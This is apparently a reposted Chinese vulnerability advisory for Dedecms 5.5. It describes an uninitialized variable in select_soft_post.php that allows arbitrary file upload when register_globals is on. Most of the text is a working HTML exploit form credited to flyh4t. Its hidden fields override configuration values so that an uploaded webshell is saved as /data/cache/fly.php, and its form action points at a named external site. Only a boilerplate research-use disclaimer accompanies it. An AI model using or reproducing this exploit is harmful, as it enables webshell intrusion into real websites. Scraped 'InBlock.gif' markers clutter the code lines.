影响版本:
Dedecms 5.5漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考
by:Flyh4t
*>
测试方法:
本站提供程序(方法)可能带有***性,仅供安全研究与教学之用,风险自负!
InBlock.gif<html>
InBlock.gif<head>
InBlock.gif <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
InBlock.gif</head>
InBlock.gif<body style= "FONT-SIZE: 9pt">
InBlock.gif ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
InBlock.gif <form action=http: //www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
InBlock.gif    <input type='hidden' name='activepath' value='/data/cache/' />
InBlock.gif    <input type='hidden' name='cfg_basedir' value='../../' />
InBlock.gif    <input type='hidden' name='cfg_imgtype' value='php' />
InBlock.gif    <input type='hidden' name='cfg_not_allowall' value='txt' />
InBlock.gif    <input type='hidden' name='cfg_softtype' value='php' />
InBlock.gif    <input type='hidden' name='cfg_mediatype' value='php' />
InBlock.gif    <input type='hidden' name='f' value='form1.enclosure' />
InBlock.gif    <input type='hidden' name='job' value='upload' />
InBlock.gif    <input type='hidden' name='newname' value='fly.php' />
InBlock.gif    Select U Shell <input type='file' name='uploadfile' size='25' />
InBlock.gif    <input type='submit' name='sb1' value='确定' />
InBlock.gif </form>
InBlock.gif <br />It's just a exp for the bug of Dedecms V55...<br />
InBlock.gif Need register_globals = on...<br />
InBlock.gif Fun the game,get a webshell at /data/cache/fly.php...<br />
InBlock.gif</body>
InBlock.gif</html>